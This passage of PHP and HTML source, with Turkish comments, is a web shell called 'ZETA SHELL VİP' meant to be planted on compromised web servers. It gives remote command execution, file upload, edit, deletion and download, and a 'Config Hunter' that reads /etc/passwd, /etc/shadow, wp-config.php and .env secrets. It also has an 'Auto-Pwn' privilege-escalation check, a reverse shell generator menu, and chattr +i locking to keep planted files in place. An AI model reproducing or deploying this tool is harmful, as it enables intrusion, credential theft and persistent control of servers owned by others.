'error'; } header('Location: ?p=' . urlencode(encodePath(PATH))); exit; } if (isset($_GET['chattr']) && isset($_GET['file'])) { /* chattr */ $file_to_chattr = PATH . '/' . urldecode($_GET['file']); $attr_cmd = $_GET['chattr'] == 'lock' ? '+i' : '-i'; $command = "chattr " . $attr_cmd . " " . escapeshellarg($file_to_chattr); $cmd_result = runCommand($command); if (stripos($cmd_result['output'], 'Operation not permitted') === false && stripos($cmd_result['output'], 'No such file') === false && stripos($cmd_result['output'], 'command not found') === false && $cmd_result['retval'] <= 1) { $_SESSION['message'] = 'chattr ' . $attr_cmd . ' attempted.'; $_SESSION['message_type'] = 'success'; } else { $_SESSION['message'] = 'Error: chattr failed: ' . $cmd_result['output']; $_SESSION['message_type'] = 'error'; } header('Location: ?p=' . urlencode(encodePath(PATH))); exit; } if (isset($_GET['d']) && isset($_GET['file'])) { /* delete */ $item_to_delete = urldecode($_GET['file']); $item_path = PATH . "/" . $item_to_delete; $success = false; $error_msg = 'Unknown error!'; if (!file_exists($item_path)) { $error_msg = 'Item not found!'; } elseif (is_file($item_path)) { if (@unlink($item_path)) { $success = true; $msg = 'File deleted!'; } else { $error_msg = 'File deletion failed!'; } } elseif (is_dir($item_path)) { if (@rmdir($item_path)) { $success = true; $msg = 'Directory deleted (empty)!'; } else { $error_msg = 'Directory deletion failed (not empty/perms)!'; } } if ($success) { $_SESSION['message'] = $msg; $_SESSION['message_type'] = 'success'; } else { $_SESSION['message'] = 'Error: ' . $error_msg; $_SESSION['message_type'] = 'error'; } header('Location: ?p=' . urlencode(encodePath(PATH))); exit; } if (isset($_GET['dl']) && isset($_GET['file'])) { /* download */ $file_to_download = urldecode($_GET['file']); $file_path = PATH . "/" . $file_to_download; if (!is_file($file_path)) { $_SESSION['message']='Error: Not a file!'; $_SESSION['message_type']='error'; header('Location: ?p=' . urlencode(encodePath(PATH))); exit; } elseif (!is_readable($file_path)) { $_SESSION['message']='Error: Cannot read file!'; $_SESSION['message_type']='error'; header('Location: ?p=' . urlencode(encodePath(PATH))); exit; } else { header('Content-Description: File Transfer'); header('Content-Type: application/octet-stream'); header('Content-Disposition: attachment; filename="' . basename($file_path) . '"'); header('Expires: 0'); header('Cache-Control: must-revalidate'); header('Pragma: public'); header('Content-Length: ' . filesize($file_path)); @ob_clean(); @flush(); @readfile($file_path); exit; } } if (isset($_GET['read_config'])) { /* read config */ $config_file = ''; $common_configs = array( 'passwd' => '/etc/passwd', 'shadow' => '/etc/shadow', 'wpconfig' => PATH . '/wp-config.php', 'wpconfig_up' => dirname(PATH) . '/wp-config.php', 'env' => PATH . '/.env', 'env_up' => dirname(PATH) . '/.env', 'apache_conf' => '/etc/apache2/apache2.conf', 'nginx_conf' => '/etc/nginx/nginx.conf', 'php_ini' => php_ini_loaded_file() ?: '/etc/php/php.ini' ); if (isset($common_configs[$_GET['read_config']])) { $config_file = $common_configs[$_GET['read_config']]; } $config_content = @file_get_contents($config_file); if ($config_content !== false) { $action_result_output = "--- Content of " . htmlspecialchars($config_file) . " ---\n\n" . htmlspecialchars($config_content); } elseif (!empty($config_file)) { $action_result_output = "Error: Cannot read " . htmlspecialchars($config_file); } else { $action_result_output = "Error: Unknown config file requested."; } } } // POST İşlemleri if ($_SERVER['REQUEST_METHOD'] === 'POST') { if (isset($_POST["upload"])) { /* ... Upload logic ... */ if(isset($_FILES["fileToUpload"]) && $_FILES["fileToUpload"]["error"] == UPLOAD_ERR_OK) { $target_file = PATH . "/" . basename($_FILES["fileToUpload"]["name"]); if (!@is_writable(PATH)) { $_SESSION['message']='Hata: Dizin ('.htmlspecialchars(PATH).') yazılamıyor!'; $_SESSION['message_type']='error'; } elseif (@move_uploaded_file($_FILES["fileToUpload"]["tmp_name"], $target_file)) { $_SESSION['message'] = htmlspecialchars(basename($_FILES["fileToUpload"]["name"])).' yüklendi!'; $_SESSION['message_type']='success'; } else { $upload_error = $_FILES["fileToUpload"]["error"]; $_SESSION['message']='Hata: Yüklenemedi! (Error: '.$upload_error.')'; $_SESSION['message_type']='error'; } } else { $upload_error = isset($_FILES["fileToUpload"]["error"]) ? $_FILES["fileToUpload"]["error"] : 'Unknown'; $php_upload_errors = array( UPLOAD_ERR_INI_SIZE=>'php.ini size limit', UPLOAD_ERR_FORM_SIZE=>'Form size limit', UPLOAD_ERR_PARTIAL=>'Partial upload', UPLOAD_ERR_NO_FILE=>'No file', UPLOAD_ERR_NO_TMP_DIR=>'No tmp dir', UPLOAD_ERR_CANT_WRITE=>'Cannot write', UPLOAD_ERR_EXTENSION=>'PHP Extension stop'); $error_message = isset($php_upload_errors[$upload_error]) ? $php_upload_errors[$upload_error] : 'Unknown upload error.'; $_SESSION['message'] = 'Hata: ' . $error_message . ' (Code: ' . $upload_error . ')'; $_SESSION['message_type']='error'; } header('Location: ?p=' . urlencode(encodePath(PATH))); exit; } elseif (isset($_POST['rename'])) { /* ... Rename logic ... */ $original_path = PATH . "/" . $_POST['original_name']; $new_path = PATH . "/" . $_POST['new_name']; if (!file_exists($original_path)) { $msg='Hata: Orijinal bulunamadı!'; $type='error'; } elseif ($original_path === $new_path) { $msg='İsimler aynı!'; $type='info'; } elseif (@rename($original_path, $new_path)) { $msg='Yeniden adlandırıldı!'; $type='success'; } else { $msg='Hata: Adlandırılamadı! İzin?'; $type='error'; } $_SESSION['message'] = $msg; $_SESSION['message_type'] = $type; header('Location: ?p=' . urlencode(encodePath(PATH))); exit; } elseif(isset($_POST['edit'])) { /* ... Edit logic ... */ $filename = PATH."/".$_POST['file_to_save']; if (!is_writable($filename)) { $msg='Hata: Hala yazılamıyor!'; $type='error'; } else { $data = $_POST['data']; if(@file_put_contents($filename, $data) !== false) { $msg='Kaydedildi!'; $type='success'; } else { $msg='Hata: Kaydedilemedi!'; $type='error'; } } $_SESSION['message'] = $msg; $_SESSION['message_type'] = $type; header('Location: ?p=' . urlencode(encodePath(PATH))); exit; } elseif(isset($_POST['run_command'])) { $cmd = $_POST['command']; $cmd_result = runCommand($cmd); $action_result_output = $cmd_result['output']; } elseif(isset($_POST['analyze_system'])) { /* ... System Analyze logic ... */ $analysis_output = "--- OS/Kernel Info ---\n"; $analysis_output .= runCommand('uname -a')['output'] . "\n"; $os_release = @file_get_contents('/etc/os-release'); $analysis_output .= ($os_release ?: runCommand('cat /etc/issue')['output']) . "\n"; $analysis_output .= "--- Sudo Version ---\n"; $analysis_output .= runCommand('sudo -V 2>&1')['output'] . "\n"; $analysis_output .= "--- SUID Binaries ---\n"; $analysis_output .= runCommand('find / -perm -4000 -type f -ls 2>/dev/null')['output'] . "\n"; $analysis_output .= "\n--- SUGGESTIONS ---\n"; $analysis_output .= "* Check kernel on exploit-db / searchsploit.\n"; $analysis_output .= "* Check sudo version for vulns (e.g., Baron Samedit).\n"; $analysis_output .= "* Analyze SUID bins using GTFOBins.\n"; $analysis_output .= "* Run 'sudo -l'.\n"; $action_result_output = $analysis_output; } elseif(isset($_POST['attempt_autopwn'])) { /* ... Auto Pwn Logic ... */ $pwn_output = "--- Attempting Auto-Pwn --- \n"; $pwn_output .= "[+] Checking 'sudo -l'...\n"; $sudo_l = runCommand('sudo -l 2>&1')['output']; $pwn_output .= $sudo_l . "\n"; if (stripos($sudo_l, 'NOPASSWD:') !== false && stripos($sudo_l, 'may run the following commands') !== false) { $pwn_output .= "[!] Potential NOPASSWD sudo found! Check allowed commands!\n"; } else { $pwn_output .= "[-] No obvious NOPASSWD sudo found.\n"; } $pwn_output .= "[+] Checking common SUID exploits (basic)...\n"; $suid_bins = array('nmap','find','vim','cp','mv','bash','more','less','nano','awk'); foreach($suid_bins as $bin) { $find_cmd = "find / -name ".$bin." -perm -4000 -type f -print 2>/dev/null"; $found = runCommand($find_cmd)['output']; if (!empty($found)) { $pwn_output .= "[!] Found SUID binary: ".$found." (Check GTFOBins for '".$bin."')\n"; } } $pwn_output .= "[-] Basic SUID checks finished.\n"; $pwn_output .= "\n--- Auto-Pwn Attempt Finished --- \n"; $action_result_output = $pwn_output; } } // POST sonu ?> <!DOCTYPE html> <html lang="tr"> <head> <meta charset="UTF-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>ZETA SHELL VİP<?php echo $SHELL_VERSION; ?> [DEBUG]</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.4.0/css/all.min.css" integrity="sha512-iecdLmaskl7CVkqkXNQ/ZH/XLlvWZOJyj7Yy7tcenmpD1ypASozpmT/E0iPtmFIB46ZmdtAc9eNBvH0H/ZpiBw==" crossorigin="anonymous" referrerpolicy="no-referrer" /> <script src="https://cdn.jsdelivr.net/npm/typed.js@2.0.12"></script> <style> /* --- KAOS CSS --- */ /* ... (CSS Stilleri önceki koddan aynen alınacak) ... */ @import url('https://fonts.googleapis.com/css2?family=Fira+Code:wght@400;700&display=swap'); :root { --bg-color: #0a0a0a; --terminal-bg: #1a1a1a; --text-color: #00ff00; --header-color: #ff003c; --link-color: #00ffff; --link-hover: #ffffff; --border-color: #333; --icon-color: #ff003c; --button-bg: #ff003c; --button-text: #000; --button-hover-bg: #ff4d6d; --table-header-bg: #2a2a2a; --code-bg: #050505; --hacker-font: 'Fira Code', monospace; --perms-color: #aaaaaa; } body { background-color: var(--bg-color); color: var(--text-color); font-family: var(--hacker-font); margin: 0; padding: 0; font-size: 14px; line-height: 1.6; overflow-x: hidden; } .container-fluid { padding: 15px; max-width: 1600px; margin: 0 auto; } .hacker-nav { background-color: var(--terminal-bg); border-bottom: 2px solid var(--header-color); padding: 8px 15px; margin-bottom: 15px; display: flex; justify-content: space-between; align-items: center; flex-wrap: wrap; } .navbar-brand { color: var(--header-color); font-weight: bold; font-size: 1.3em; text-shadow: 0 0 5px var(--header-color); } .navbar-brand i { margin-right: 8px; } .navbar-brand a, .breadcrumb a { color: var(--link-color); text-decoration: none; margin: 0 2px; } .navbar-brand a:hover, .breadcrumb a:hover { color: var(--link-hover); text-decoration: underline; } .breadcrumb { background: var(--terminal-bg); padding: 8px 12px; margin-bottom:15px; border: 1px solid var(--border-color); border-radius: 3px; word-break: break-all; color: var(--text-color); font-size: 0.9em; } .breadcrumb i { margin-right: 5px; color: var(--header-color); } .hacker-controls a button, .hacker-controls input[type="submit"], .quick-cmd-btn, .action-btn, .config-btn { background-color: var(--button-bg); color: var(--button-text); border: none; padding: 4px 8px; margin-left: 8px; cursor: pointer; font-family: var(--hacker-font); font-weight: bold; transition: background-color 0.3s ease; border-radius: 3px; font-size: 0.85em; margin-bottom: 5px; } .hacker-controls a button:hover, .hacker-controls input[type="submit"]:hover, .quick-cmd-btn:hover, .action-btn:hover, .config-btn:hover { background-color: var(--button-hover-bg); } .hacker-controls i { margin-right: 4px;} .hacker-table { width: 100%; border-collapse: collapse; margin-top: 15px; background-color: var(--terminal-bg); border: 1px solid var(--border-color); box-shadow: 0 0 10px rgba(255, 0, 60, 0.2); } .hacker-table th, .hacker-table td { border: 1px solid var(--border-color); padding: 6px 10px; text-align: left; vertical-align: middle; word-break: break-all; font-size: 0.9em; } .hacker-table th { background-color: var(--table-header-bg); color: var(--header-color); font-weight: bold; } .hacker-table tr:nth-child(even) { background-color: rgba(0, 255, 0, 0.03); } .hacker-table tr:hover { background-color: rgba(0, 255, 255, 0.08); } .hacker-table td a { color: var(--link-color); text-decoration: none; margin-right: 6px; display: inline-block; position: relative; } .hacker-table td a:hover { color: var(--link-hover); } .hacker-table td a .tooltiptext { visibility: hidden; width: 80px; background-color: #555; color: #fff; text-align: center; border-radius: 6px; padding: 5px 0; position: absolute; z-index: 1; bottom: 125%; left: 50%; margin-left: -40px; opacity: 0; transition: opacity 0.3s; font-size: 0.8em; } .hacker-table td a:hover .tooltiptext { visibility: visible; opacity: 1; } .hacker-icon-folder { color: #ffff00; } .hacker-icon-error { color: #ff4d4d; } .hacker-icon-config { color: #cccccc; } .hacker-icon-code { color: #66ccff; } .hacker-icon-image { color: #cc99ff; } .hacker-icon-audio { color: #ff99cc; } .hacker-icon-video { color: #ffcc66; } .hacker-icon-text { color: #ffffff; } .hacker-icon-archive { color: #99ff99; } .hacker-icon-doc { color: #ffad33; } .hacker-icon-default { color: var(--text-color); } .hacker-icon-lock { color: #f0ad4e; } .hacker-icon-anchor { color: #d9534f; } .perms { color: var(--perms-color); font-size: 0.9em; cursor: help; } form { margin-bottom: 15px; } .form-section { background-color: var(--terminal-bg); padding: 15px; margin-top: 15px; border: 1px solid var(--border-color); border-radius: 5px; } .form-section h3 { font-size: 1.1em; margin-bottom: 10px; color: var(--header-color);} input[type="file"], input[type="text"], textarea, select { background-color: var(--code-bg); color: var(--text-color); border: 1px solid var(--border-color); padding: 6px; margin: 4px 0; width: calc(100% - 18px); font-family: var(--hacker-font); border-radius: 3px; font-size: 0.9em; } textarea { min-height: 250px; resize: vertical; } select { width: auto; } .message { padding: 8px 12px; margin: 12px 0; border-radius: 3px; font-weight: bold; border: 1px solid transparent; font-size: 0.9em;} .message.success { background-color: rgba(0, 255, 0, 0.1); border-color: var(--text-color); color: var(--text-color); text-shadow: 0 0 3px var(--text-color); } .message.error { background-color: rgba(255, 0, 60, 0.1); border-color: var(--header-color); color: var(--header-color); text-shadow: 0 0 3px var(--header-color); } .message i { margin-right: 6px; } .command-section, .collapsible-section { background-color: var(--terminal-bg); border: 1px solid var(--border-color); padding: 15px; margin-top: 20px; border-radius: 5px; } .collapsible-section summary { color: var(--header-color); font-size: 1.1em; margin-bottom: 10px; cursor: pointer; font-weight: bold; list-style: none; /* Oku gizle */ } .collapsible-section summary::-webkit-details-marker { display: none; /* Oku gizle (webkit) */ } .collapsible-section summary::before { content: '\f078'; /* FontAwesome down arrow */ font-family: 'Font Awesome 6 Free'; font-weight: 900; margin-right: 8px; display: inline-block; transition: transform 0.2s; } .collapsible-section[open] summary::before { transform: rotate(-180deg); } .collapsible-section[open] summary { border-bottom: 1px solid var(--header-color); padding-bottom: 5px; } .command-section h3, .collapsible-section h4 { color: var(--header-color); font-size: 1.1em; margin-bottom: 10px; } .command-form { display: flex; margin-bottom: 10px;} .command-form input[type="text"] { flex-grow: 1; margin-right: 10px; } .quick-cmd-buttons button, .config-btn { margin-right: 5px; margin-bottom: 5px;} pre.command-output, pre.info-output { background-color: var(--code-bg); color: var(--text-color); border: 1px solid var(--border-color); padding: 10px; margin-top: 10px; border-radius: 3px; white-space: pre-wrap; word-wrap: break-word; max-height: 400px; overflow-y: auto; font-size: 0.9em; } .hacker-footer { text-align: center; margin-top: 30px; padding: 10px; color: #555; font-size: 0.85em; border-top: 1px solid var(--border-color); } .hacker-footer a { color: var(--link-color); text-decoration: none; } .hacker-footer a:hover { color: var(--link-hover); } @keyframes fadeIn { from { opacity: 0; } to { opacity: 1; } } @keyframes glow { 0% { text-shadow: 0 0 3px var(--header-color), 0 0 5px var(--header-color); } 50% { text-shadow: 0 0 8px var(--header-color), 0 0 15px var(--header-color); } 100% { text-shadow: 0 0 3px var(--header-color), 0 0 5px var(--header-color); } } .navbar-brand span { animation: glow 2.5s infinite alternate; } body { animation: fadeIn 0.8s ease-out; } @media (max-width: 768px) { /* ... responsive stiller ... */ .hacker-nav { flex-direction: column; align-items: flex-start;} .hacker-controls { margin-top: 10px; width: 100%; text-align: right;} .hacker-table th, .hacker-table td { padding: 5px 6px; font-size: 0.85em;} .hacker-table td a { margin-right: 4px;} textarea { min-height: 200px; } .hacker-table td:nth-child(2), .hacker-table th:nth-child(2), .hacker-table td:nth-child(3), .hacker-table th:nth-child(3) { display: none; } .command-form { flex-direction: column;} .command-form input[type="text"] { margin-right: 0; margin-bottom: 5px;} } </style> </head> <body> <div class="container-fluid"> <nav class="hacker-nav"> <div class="navbar-brand"> <i class="fas fa-meteor"></i> <span id="shell-title"></span> </div> <div class="hacker-controls"> <a href="?upload=1&p=<?php echo urlencode(encodePath(PATH)); ?>"><button type="button"><i class="fas fa-upload"></i> Upload</button></a> <a href="?p=<?php echo encodePath('/'); ?>"><button type="button"><i class="fas fa-broadcast-tower"></i> ROOT</button></a> <a href="?p=<?php echo urlencode(encodePath($doc_root)); ?>"><button type="button"><i class="fas fa-sitemap"></i> WebRoot</button></a> </div> </nav> <div class="breadcrumb"> <i class="fas fa-folder"></i> Path: <?php /* Breadcrumb Kodu */ $path_for_breadcrumb = PATH; $path_for_breadcrumb = str_replace('\\', '/', $path_for_breadcrumb); if (empty($path_for_breadcrumb) || $path_for_breadcrumb === '/') { echo "<a href=\"?p=" . encodePath('/') . "\">/</a>"; } else { $paths = explode('/', $path_for_breadcrumb); $current_built_path = ''; $is_windows_path = preg_match('/^[a-zA-Z]:$/', isset($paths[0]) ? $paths[0] : ''); foreach ($paths as $id => $dir_part) { if ($dir_part === '' && $id === 0 && !$is_windows_path) { $current_built_path = '/'; echo "<a href=\"?p=" . encodePath($current_built_path) . "\">/</a>"; continue; } if ($is_windows_path && $id === 0) { $current_built_path = $dir_part . '/'; echo "<a href=\"?p=" . encodePath($current_built_path) . "\">" . htmlspecialchars($dir_part) . "</a>/"; continue; } if ($dir_part === '') continue; if ($current_built_path === '/' || preg_match('/\/$/', $current_built_path)) { $current_built_path .= $dir_part; } else { $current_built_path .= '/' . $dir_part; } echo "<a href='?p=" . encodePath($current_built_path) . "'>" . htmlspecialchars($dir_part) . "</a>/"; } } ?> </div> <?php if (!empty($message)): /* Mesaj */ echo '<div class="message '.$message_type.'"><i class="fas fa-info-circle"></i> '.$message.'</div>'; endif; ?> <?php // --- Ana İçerik Alanı --- $show_file_manager = true; // Varsayılan if (isset($_GET['upload']) || (isset($_GET['r']) && isset($_GET['file'])) || (isset($_GET['e']) && isset($_GET['file']))) { // Formları göster if (isset($_GET['upload'])) { /* Upload Form */ echo '<div class="form-section"><h3><i class="fas fa-upload"></i> Upload to ' . htmlspecialchars(PATH) . '</h3><form method="post" enctype="multipart/form-data" action="?p='.urlencode(encodePath(PATH)).'"><input type="file" name="fileToUpload" id="fileToUpload" required><input type="submit" class="action-btn" value="Upload!" name="upload"></form></div>'; } elseif (isset($_GET['r']) && isset($_GET['file'])) { /* Rename Form */ $item_to_rename = urldecode($_GET['file']); echo '<div class="form-section"><h3><i class="fas fa-edit"></i> Rename: ' . htmlspecialchars($item_to_rename). '</h3><form method="post" action="?p='.urlencode(encodePath(PATH)).'"><input type="hidden" name="original_name" value="' . htmlspecialchars($item_to_rename) . '">New Name:<input type="text" name="new_name" value="' . htmlspecialchars($item_to_rename) . '" required><input type="submit" class="action-btn" value="Rename!" name="rename"></form></div>'; } elseif (isset($_GET['e']) && isset($_GET['file'])) { /* Edit Form */ $file_to_edit = urldecode($_GET['file']); $file_path = PATH . "/" . $file_to_edit; echo '<div class="form-section">'; if (!is_file($file_path)) { echo '<div class="message error">Hata: Dosya değil!</div>'; } elseif (!is_readable($file_path)) { echo '<div class="message error">Hata: Okunamıyor!</div>'; } elseif (!is_writable($file_path)) { echo '<div class="message error">Uyarı: Yazılamıyor!</div>'; $content = htmlspecialchars(@file_get_contents($file_path) ?: ''); echo '<h4><i class="fas fa-eye"></i> Viewing: ' . htmlspecialchars($file_to_edit) . '</h4><textarea readonly style="background-color: #101010;">' . $content . '</textarea>'; } else { $content = htmlspecialchars(@file_get_contents($file_path) ?: ''); echo '<form method="post" action="?p='.urlencode(encodePath(PATH)).'"><h3 style="color: var(--header-color);"><i class="fas fa-file-pen"></i> Editing: ' . htmlspecialchars($file_to_edit) . '</h3><textarea name="data">' . $content . '</textarea><br><input type="hidden" name="file_to_save" value="' . htmlspecialchars($file_to_edit) . '"><input type="submit" class="action-btn" value="Save Changes!" name="edit"></form>'; } echo '</div>'; } $show_file_manager = false; } // Dosya Yöneticisi if ($show_file_manager) { if (!is_dir(PATH)) { echo '<div class="message error"><i class="fas fa-exclamation-triangle"></i> Hata: Dizin değil! Path: ' . htmlspecialchars(PATH) . '</div>'; } elseif (!($scan = @scandir(PATH))) { echo '<div class="message error"><i class="fas fa-exclamation-triangle"></i> Hata: Dizin okunamadı! (' . htmlspecialchars(PATH) . ')</div>'; } else { // Dosya/Klasör listeleme tablosu... $folders = array(); $files = array(); foreach ($scan as $obj) { if ($obj == '.' || $obj == '..') continue; $full_obj_path = PATH . '/' . $obj; if (@is_dir($full_obj_path)) { array_push($folders, $obj); } else { array_push($files, $obj); } } usort($folders, 'strcoll'); usort($files, 'strcoll'); echo '<table class="hacker-table"><thead><tr><th>Name</th><th>Size</th><th>Modified</th><th>Perms</th><th>Actions</th></tr></thead><tbody>'; foreach ($folders as $folder) { $folder_path = PATH . "/" . $folder; $perms = @fileperms($folder_path); $perms_str = ($perms === false) ? '????' : substr(sprintf('%o', $perms), -4); $mtime = @filemtime($folder_path); $mtime_str = ($mtime === false) ? '???' : date("Y-m-d H:i:s", $mtime); $perms_readable = perms_to_string($perms); $file_encoded = urlencode($folder); $path_encoded_url = urlencode(encodePath(PATH)); echo "<tr><td>" . fileIcon($folder) . "<a href='?p=" . urlencode(encodePath($folder_path)) . "'>" . htmlspecialchars($folder) . "</a></td><td><b>[DIR]</b></td><td>" . $mtime_str . "</td><td><span class='perms' title='" . $perms_readable . "'>" . $perms_str . "</span></td><td><a title='Edit' href='#' onclick='alert(\"Klasör!\"); return false;'><i class='fas fa-file-pen' style='opacity:0.3;'></i></a> <a title='Rename' href='?r=1&file=" . $file_encoded . "&p=" . $path_encoded_url . "'><i class='fas fa-edit'></i></a> <a title='Delete' href='?d=1&file=" . $file_encoded . "&p=" . $path_encoded_url . "' onclick='return confirm(\"Sil?\");'><i class='fas fa-trash'></i></a> <a title='Download' href='#' onclick='alert(\"Klasör!\"); return false;'><i class='fas fa-download' style='opacity:0.3;'></i></a> | <a title='Lock (0444)' href='?chmod=0444&file=" . $file_encoded . "&p=" . $path_encoded_url . "'><i class='fas fa-lock hacker-icon-lock'></i></a> <a title='Unlock (0755)' href='?chmod=0755&file=" . $file_encoded . "&p=" . $path_encoded_url . "'><i class='fas fa-unlock hacker-icon-lock'></i></a> | <a title='IMMUTABLE (+i)' href='?chattr=lock&file=" . $file_encoded . "&p=" . $path_encoded_url . "' onclick='return confirm(\"chattr +i?\");'><i class='fas fa-anchor hacker-icon-anchor'></i></a> <a title='Mutable (-i)' href='?chattr=unlock&file=" . $file_encoded . "&p=" . $path_encoded_url . "' onclick='return confirm(\"chattr -i?\");'><i class='fas fa-unlink hacker-icon-anchor'></i></a></td></tr>"; } foreach ($files as $file) { $file_path = PATH . "/" . $file; $perms = @fileperms($file_path); $perms_str = ($perms === false) ? '????' : substr(sprintf('%o', $perms), -4); $size = @filesize($file_path); $size_str = ($size === false) ? '???' : formatSizeUnits($size); $mtime = @filemtime($file_path); $mtime_str = ($mtime === false) ? '???' : date("Y-m-d H:i:s", $mtime); $perms_readable = perms_to_string($perms); $file_encoded = urlencode($file); $path_encoded_url = urlencode(encodePath(PATH)); echo "<tr><td>" . fileIcon($file) . htmlspecialchars($file) . "</td><td>" . $size_str . "</td><td>" . $mtime_str . "</td><td><span class='perms' title='" . $perms_readable . "'>" . $perms_str . "</span></td><td><a title='Edit' href='?e=1&file=" . $file_encoded . "&p=" . $path_encoded_url . "'><i class='fas fa-file-pen'></i></a> <a title='Rename' href='?r=1&file=" . $file_encoded . "&p=" . $path_encoded_url . "'><i class='fas fa-edit'></i></a> <a title='Delete' href='?d=1&file=" . $file_encoded . "&p=" . $path_encoded_url . "' onclick='return confirm(\"Sil?\");'><i class='fas fa-trash'></i></a> <a title='Download' href='?dl=1&file=" . $file_encoded . "&p=" . $path_encoded_url . "'><i class='fas fa-download'></i></a> | <a title='Lock (0444)' href='?chmod=0444&file=" . $file_encoded . "&p=" . $path_encoded_url . "'><i class='fas fa-lock hacker-icon-lock'></i></a> <a title='Unlock (0644)' href='?chmod=0644&file=" . $file_encoded . "&p=" . $path_encoded_url . "'><i class='fas fa-unlock hacker-icon-lock'></i></a> | <a title='IMMUTABLE (+i)' href='?chattr=lock&file=" . $file_encoded . "&p=" . $path_encoded_url . "' onclick='return confirm(\"chattr +i?\");'><i class='fas fa-anchor hacker-icon-anchor'></i></a> <a title='Mutable (-i)' href='?chattr=unlock&file=" . $file_encoded . "&p=" . $path_encoded_url . "' onclick='return confirm(\"chattr -i?\");'><i class='fas fa-unlink hacker-icon-anchor'></i></a></td></tr>"; } echo "</tbody></table>"; } } ?> <!-- Komut Çalıştırma --> <div class="command-section"> <h3><i class="fas fa-terminal"></i> Execute Command</h3> <div class="quick-cmd-buttons"> <button class="quick-cmd-btn" onclick="setCmd('whoami')">whoami</button> <button class="quick-cmd-btn" onclick="setCmd('id')">id</button> <button class="quick-cmd-btn" onclick="setCmd('uname -a')">uname -a</button> <button class="quick-cmd-btn" onclick="setCmd('ps aux')">ps aux</button> <button class="quick-cmd-btn" onclick="setCmd('netstat -tulnp')">netstat</button> </div> <form method="post" action="?p=<?php echo urlencode(encodePath(PATH)); ?>" class="command-form"> <input type="text" id="command_input" name="command" placeholder="Enter command..." value="<?php echo isset($_POST['command']) ? htmlspecialchars($_POST['command']) : ''; ?>" required> <button type="submit" name="run_command" class="action-btn">Run!</button> </form> <?php if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['run_command'])): ?> <h4>Output:</h4> <pre class="command-output"><?php echo $action_result_output; ?></pre> <?php endif; ?> </div> <!-- Açılır/Kapanır Bölümler --> <details class="collapsible-section" <?php echo ($_SERVER['REQUEST_METHOD'] === 'POST' && (isset($_POST['analyze_system']) || isset($_POST['attempt_autopwn']))) ? 'open' : ''; // Analiz yapıldıysa açık gelsin ?>> <summary><i class="fas fa-shield-alt"></i> System Info & Exploit Helper</summary> <div> <form method="post" action="?p=<?php echo urlencode(encodePath(PATH)); ?>" style="display:inline-block;"> <button type="submit" name="analyze_system" class="action-btn">Analyze System</button> </form> <form method="post" action="?p=<?php echo urlencode(encodePath(PATH)); ?>" style="display:inline-block;"> <button type="submit" name="attempt_autopwn" class="action-btn" style="background:#f0ad4e;color:#000;" onclick="return confirm('Auto-Pwn?')">Try Auto-Pwn!</button> </form> <?php if (($_SERVER['REQUEST_METHOD'] === 'POST' && (isset($_POST['analyze_system']) || isset($_POST['attempt_autopwn'])))): ?> <h4>Analysis / Attempt Result:</h4> <pre class="info-output"><?php echo $action_result_output; ?></pre> <p> <a href="https://www.exploit-db.com/" target="_blank" class="action-btn">Search Exploit-DB</a> <a href="https://gtfobins.github.io/" target="_blank" class="action-btn">Check GTFOBins</a> </p> <?php endif; ?> </div> </details> <details class="collapsible-section"> <summary><i class="fas fa-satellite-dish"></i> Reverse Shell Helper</summary> <div> <form method="post" onsubmit="generateShell(event)"> Your IP: <input type="text" id="rev_ip" value="<?php echo htmlspecialchars($_SERVER['REMOTE_ADDR']); ?>" style="width:150px; display:inline-block; margin-right:10px;"> Port: <input type="text" id="rev_port" value="4444" style="width:80px; display:inline-block; margin-right:10px;"> Type: <select id="shell_type" style="background:var(--code-bg); color:var(--text-color); border:1px solid var(--border-color); padding: 4px;"> <option value="bash_tcp">Bash TCP</option> <option value="nc_e">Netcat -e</option> <option value="nc_mkfifo">Netcat mkfifo</option> <option value="python3">Python3</option> <option value="php">PHP</option> <option value="perl">Perl</option> <option value="ruby">Ruby</option> <option value="socat">Socat</option> </select> <button type="submit" class="action-btn">Generate!</button> </form> <pre id="generated_shell_output" class="command-output" style="margin-top:10px; display:none;"></pre> </div> </details> <details class="collapsible-section" <?php echo ($_SERVER['REQUEST_METHOD'] === 'GET' && isset($_GET['read_config'])) ? 'open' : ''; ?>> <summary><i class="fas fa-key"></i> Config Hunter</summary> <div> <p>Attempt to read common configuration files:</p> <div class="quick-cmd-buttons"> <a href="?read_config=passwd&p=<?php echo urlencode(encodePath(PATH)); ?>"><button class="config-btn">/etc/passwd</button></a> <a href="?read_config=shadow&p=<?php echo urlencode(encodePath(PATH)); ?>"><button class="config-btn" style="background:#f0ad4e;color:#000;">/etc/shadow</button></a> <a href="?read_config=wpconfig&p=<?php echo urlencode(encodePath(PATH)); ?>"><button class="config-btn">wp-config (here)</button></a> <a href="?read_config=wpconfig_up&p=<?php echo urlencode(encodePath(PATH)); ?>"><button class="config-btn">wp-config (up)</button></a> <a href="?read_config=env&p=<?php echo urlencode(encodePath(PATH)); ?>"><button class="config-btn">.env (here)</button></a> <a href="?read_config=env_up&p=<?php echo urlencode(encodePath(PATH)); ?>"><button class="config-btn">.env (up)</button></a> <a href="?read_config=apache_conf&p=<?php echo urlencode(encodePath(PATH)); ?>"><button class="config-btn">apache2.conf</button></a> <a href="?read_config=nginx_conf&p=<?php echo urlencode(encodePath(PATH)); ?>"><button class="config-btn">nginx.conf</button></a> <a href="?read_config=php_ini&p=<?php echo urlencode(encodePath(PATH)); ?>"><button class="config-btn">php.ini</button></a> </div> <?php if ($_SERVER['REQUEST_METHOD'] === 'GET' && isset($_GET['read_config'])): ?> <h4>Config Content:</h4> <pre class="info-output"><?php echo $action_result_output; ?></pre> <?php endif; ?> </div> </details> <!-- Footer --> <div class="hacker-footer"> <p>~~ ZETA SHELL VİP <?php echo $SHELL_VERSION; ?> coded by <span style="color:var(--header-color); font-weight:bold;">berofc</span> ~~</p> <p> <a href="https://instagram.com/Berofc" target="_blank"><i class="fab fa-instagram"></i> Instagram: Berofc</a> </p> </div> </div> <!-- container-fluid sonu --> <script> // --- Shell JavaScript --- var typed = new Typed('#shell-title', { strings: ['ZETA SHELL VIP <?php echo $SHELL_VERSION; ?>', 'SYSTEM_BREACHED_ALPHA', 'BEROFC_ONLINE', 'AWAITING_KAOS...^1000'], typeSpeed: 40, backSpeed: 25, loop: true, showCursor: true, cursorChar: '█', smartBackspace: true }); function perms_to_string_js(permsOctalStr) { /* ... JS perms kodu ... */ if 